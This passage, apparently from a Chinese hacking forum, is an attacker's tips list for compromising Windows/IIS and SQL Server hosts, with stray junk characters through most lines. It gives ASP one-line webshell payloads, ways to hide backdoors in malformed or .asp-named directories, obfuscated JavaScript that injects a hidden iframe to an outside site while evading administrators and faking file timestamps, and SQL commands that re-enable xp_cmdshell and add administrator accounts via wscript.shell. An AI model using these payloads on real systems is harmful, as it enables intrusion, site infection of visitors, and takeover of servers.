b).<%Execute(request("go"))%>8 k% o0 Q- S: C4 Q4 M: k8 x
c).%><%execute request("go")%><%
, u4 m% O& D8 P' Id).<script language=VBScript runat=server>execute request("sb")</Script>; T0 s  b: D( s; x* v0 e
e).<%25Execute(request("l"))%25>
# I+ \" t8 L; A; If).<%if request("cmd")<>"" then execute request("pass")%>' H1 R- ]$ W' B) g. H

5 v/ I) i+ Z+ ]; `: K52、at "12:17" /interactive cmd/ S6 ~8 d' Q) g  Y( {" M, r$ O5 W
执行后可以用AT命令查看新加的任务  `9 X7 F% F- v2 O
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。$ R7 f2 N: w) l) x$ p1 b
1 e! x% J9 F% g: X+ j0 O; j
53、隐藏ASP后门的两种方法. j# S- c7 D; a3 r( M( S& v' j9 V: D
1、建立非标准目录:mkdir images..\
/ r- N4 B5 n/ p3 V8 n* v9 N7 o拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
: o3 B& ?% t" z: P$ ]# Q! {& B通过web访问ASP木马:http://ip/images../news.asp?action=login
" |# {) Q5 k# S如何删除非标准目录:rmdir images..\ /s
6 G' }* U. h( C$ A( c2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
2 v7 Y- A% \4 i- r5 _. d% I7 pmkdir programme.asp
' d% |9 |, m# s: n新建1.txt文件内容:<!--#include file=”12.jpg”-->
- I0 c1 U$ l3 M' b: n* e新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件% U$ ~) u4 _8 f& q' U
attrib +H +S programme.asp
5 k4 ~9 z7 k7 X- r9 X: d' l' ~通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
4 E' s" ]( k( P' p
# L/ H8 ?$ M" ~( W; j) e+ m- S54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
, }' U% ]5 w; ?9 `( Q然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
8 ^, |3 S) v+ q; X0 L7 i& b, E7 s/ {, Q. v; n( X4 K! v# ^* Y
55、JS隐蔽挂马
, ?* g2 A1 y! L$ h& ?1.
' A& p9 h) P7 ]; v# b  T6 Nvar tr4c3="<iframe src=ht";
8 B- k5 G$ j0 J9 S+ u  h3 qtr4c3 = tr4c3+"tp:/";: i$ F1 P' P/ m+ F; g
tr4c3 = tr4c3+"/ww";6 B2 E2 s: u; F% d* ^: _3 S
tr4c3 = tr4c3+"w.tr4";
4 N) H% j7 `% |1 O2 Ktr4c3 = tr4c3+"c3.com/inc/m";" j9 ?# ~$ [) e( P- |& h+ j
tr4c3 = tr4c3+"m.htm style="display:none"></i";
4 U: ]1 _- t* Y8 S: u( c, o! otr4c3 =tr4c3+"frame>'";4 _& V" K! h; [% u- E  r
document.write(tr4c3);, x1 V4 @% K* Q$ o5 K# a8 T( ~$ U
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。7 L& V/ D3 P/ k% m' |
+ H" G, L- m! N. F
2.6 m+ [7 \; `/ u6 K# Y. u8 T3 `& h, l
转换进制,然后用EVAL执行。如
1 i; R2 S) z+ P( Veval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
6 {7 z/ n9 E- n不过这个有点显眼。
* C" j$ r7 P, G+ |4 F* a9 y3." r/ E! j) K; k7 Q, P& Z
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');$ `( L+ q; ~& ~
最后一点,别忘了把文件的时间也修改下。' t+ c4 `  w1 A# m
7 S2 _  L8 S# h/ H+ F* B/ s3 i
56.3389终端入侵常用DOS命令3 A( V8 [4 {) T! o1 \
taskkill taskkill /PID 1248 /t
% w. ?; R% A- N. f" Z1 q- s+ Y) i$ d* C5 z$ y
tasklist 查进程8 A. v' c/ j0 `4 Z# W  q
% F) v/ f. X0 Z
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
5 t8 \$ s( a  g& z" G# L  ^: R0 Yiisreset /reboot0 V  d: C$ G& E- P
tsshutdn /reboot /delay:1    重起服务器
0 `& ^6 m; r( o3 D0 p6 h
2 s0 S5 {* h, u( ]logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
/ ]  {" Y( B8 E
0 m5 w7 A: u  Pquery user 查看当前终端用户在线情况( v! U& r: N2 o3 Z& c1 m

' `8 g8 l% ]7 T+ ~5 V要显示有关所有会话使用的进程的信息,请键入:query process *
: |9 q# R5 B9 G& t6 l% P- t5 Q& m$ K. B' K: ^. ~
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
6 e: p9 }8 f" L- U5 H5 ?: O
# f. J, I" a1 X! k要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
1 i2 s5 r/ w" {5 u0 i  ?/ @4 L2 `# |2 @) s6 N
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02" G, \- c& H+ ~
: X, X* ]% |7 ~2 \# l  A3 B6 G
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
( f) h, J8 {  W  E5 S$ \/ B7 h7 D$ v9 }& s
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
: C4 q, X8 E. O& B5 F+ A, X# j7 |- S  W$ e
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
3 g% Y! n# y' \2 p) _- K- E' a- c$ \! r# \3 S
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机2 B' u' e* D0 t( t4 c

% h* J" O( p1 n0 V56、在地址栏或按Ctrl+O,输入:
" {5 v3 o' L4 gjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;- C9 D+ G2 t/ X& T. M

- D- C4 N/ ?/ p  D4 c# U; x源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。. z# O3 k5 @: ?! _
6 T+ Z7 Z% X5 A3 f
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
( g( }: N' ]; E, A* p用net localgroup administrators是可以看到管理组下,加了$的用户的。7 F9 u7 T+ O- ?8 u1 z

: P$ t& F3 _4 z/ z( M58、 sa弱口令相关命令
7 w: }4 \$ q( b% A
2 n+ E6 R. x: i' x% J6 ~一.更改sa口令方法:
8 H  x. W/ \& o* w6 W  n用sql综合利用工具连接后,执行命令:$ O& F$ U) f, y
exec sp_password NULL,'20001001','sa'' f8 p' C* _( D" m
(提示:慎用!)
* f* z7 u8 j( z" D3 {) i; N) C! q7 A
二.简单修补sa弱口令.3 Y$ s# k6 f) l% f" u- a. I$ ?

) h/ x3 R$ S* @% y7 [/ y  l4 X, `方法1:查询分离器连接后执行:; ?$ Q- {: E; X; h
if exists (select * from1 @+ \; l6 q" i+ M& ?. N' J
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and1 }7 U$ S* u( k
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
/ m7 ~2 H8 M, `7 D# i: t# @  A9 I) y3 r5 M. G0 o" i
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
  l6 V9 x2 U: {- q
- b% U" L2 i6 I- _1 c* dGO$ J' M) S& D& |! B) }) F

! [* ?. ^/ i+ W# }: e然后按F5键命令执行完毕
( p* H$ \. p( ?2 _$ f
2 j* A( C! Y+ Q$ D5 E4 {6 E方法2:查询分离器连接后9 \5 V% F8 }. f$ X7 T! W
第一步执行:use master
, G- @% \* v9 m- U  J第二步执行:sp_dropextendedproc 'xp_cmdshell'4 i6 J* L1 u' Z, P* o( B
然后按F5键命令执行完毕3 R0 ]; U8 O8 C" h
; U8 z4 B. _) @" a  Z/ H
; J, r5 {* Q' [4 c5 ^: W! ]4 h
三.常见情况恢复执行xp_cmdshell.2 c% O& r4 z+ j% n& [! G0 [0 v# [

  P  ^3 x6 X3 y( H9 s* T
# T  @; h0 ~% e: b1 未能找到存储过程'master..xpcmdshell'.
& u7 b1 r4 Y) ]% k1 n2 X! B   恢复方法:查询分离器连接后,
3 T" y( c0 M1 X" |6 F' C! _* x第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
( n% H& L  v3 o4 \; j6 m第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
( y  L7 n: `9 |# U  S& n  Z9 `然后按F5键命令执行完毕
9 ?, g# E9 Y% M: H
5 }& |- J+ \' `- \8 e1 r0 f2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)2 Q4 H- D& L$ q; U. D$ y7 t; U
恢复方法:查询分离器连接后,
! b+ H; N' ]! {+ F- k第一步执行:sp_dropextendedproc "xp_cmdshell"
8 j6 V& j1 V/ d7 s第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'+ W7 E7 R0 R* t/ F3 a
然后按F5键命令执行完毕
# R' r; w+ M% O. _: W7 l
. y9 T! T6 Z4 u3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
/ l, P3 O. E0 s0 \恢复方法:查询分离器连接后,# Q/ L. K2 `  [, I/ n/ f- M
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
' L* a9 I& P& L第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
( I' ^# q- s. V3 j# n0 g% O7 }/ N然后按F5键命令执行完毕
/ W$ F: [# S9 z% [* W- k/ Z
% M" R3 o6 O! Z4 s四.终极方法.* \1 E' n- A/ H8 S
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:2 O; @+ O; z; k5 `
查询分离器连接后,, G8 a5 W% ~! @: Z
2000servser系统:
$ x/ l% x, W8 adeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add': d/ \; L4 n- s- ~, o" j4 n: ^

+ P- _2 v! ?5 G* ], L) tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
2 O# X# q4 ]' H/ O: f9 @6 i/ k- y3 g8 O! H
xp或2003server系统:
$ ^3 C9 E, o1 A) S2 `# `5 B* E
! f) s$ n; R: }" C& ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'; r; I7 i: C/ X

5 R8 y. K  {2 _declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'/ q  P0 G' D  n





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2